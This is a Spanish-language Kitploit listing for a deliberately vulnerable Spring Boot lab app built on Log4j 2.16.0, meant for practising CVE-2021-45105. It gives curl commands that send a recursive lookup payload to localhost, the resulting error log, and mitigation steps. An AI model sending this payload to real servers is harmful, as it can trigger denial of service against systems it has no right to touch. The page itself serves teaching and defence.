Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
https-github.com-pravin-pp-log4j2-CVE-2021-45105-1 — Aplicación Spring Boot de ejemplo intencionalmente vulnerable a Log4j2 CVE-2021-45105 para practicar la explotación y comprender el denial-of-service por bucle infinito mediante cabeceras HTTP diseñadas. | Kitploit
Herramientas/GitHubGitHub/dileepdkumar/https-github.com-pravin-pp-log4j2-cve-2021-45105-1
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubdileepdkumar/https-github.com-pravin-pp-log4j2-cve-2021-45105-1

https-github.com-pravin-pp-log4j2-CVE-2021-45105-1

Aplicación Spring Boot de ejemplo intencionalmente vulnerable a Log4j2 CVE-2021-45105 para practicar la explotación y comprender el denial-of-service por bucle infinito mediante cabeceras HTTP diseñadas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 4 añosAún no revisado

Aplicación vulnerable de muestra Log4j2 (CVE-2021-45105)

Versiones afectadas: todas las versiones desde 2.0-beta9 hasta 2.16.0

Esta aplicación está basada en una aplicación web Spring Boot vulnerable a CVE-2021-45105

Utiliza Log4j 2.16.0

Ejecutar la aplicación

Ejecútalo:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

Pasos de explotación

  • Luego, desencadena el exploit usando:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • Observa la salida que muestra un bucle infinito, sin embargo durante las pruebas no se encontró que este DOS sea consumidor de recursos ya que este bucle infinito es identificado por el programa y se produce un error:
root@kitploit:~

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	

Mitigación :

Los usuarios de Java 8 (o posterior) deberían actualizar a la versión 2.17.0.

Alternativamente, esto se puede mitigar en la configuración:

En PatternLayout en la configuración de logging, reemplace las búsquedas de contexto como ${ctx:loginId} o $${ctx:loginId} con patrones de Thread Context Map (%X, %mdc, o %MDC). De lo contrario, en la configuración, elimine las referencias a búsquedas de contexto como ${ctx:loginId} o $${ctx:loginId} donde se originen de fuentes externas a la aplicación como encabezados HTTP o entrada del usuario.

Descargar herramienta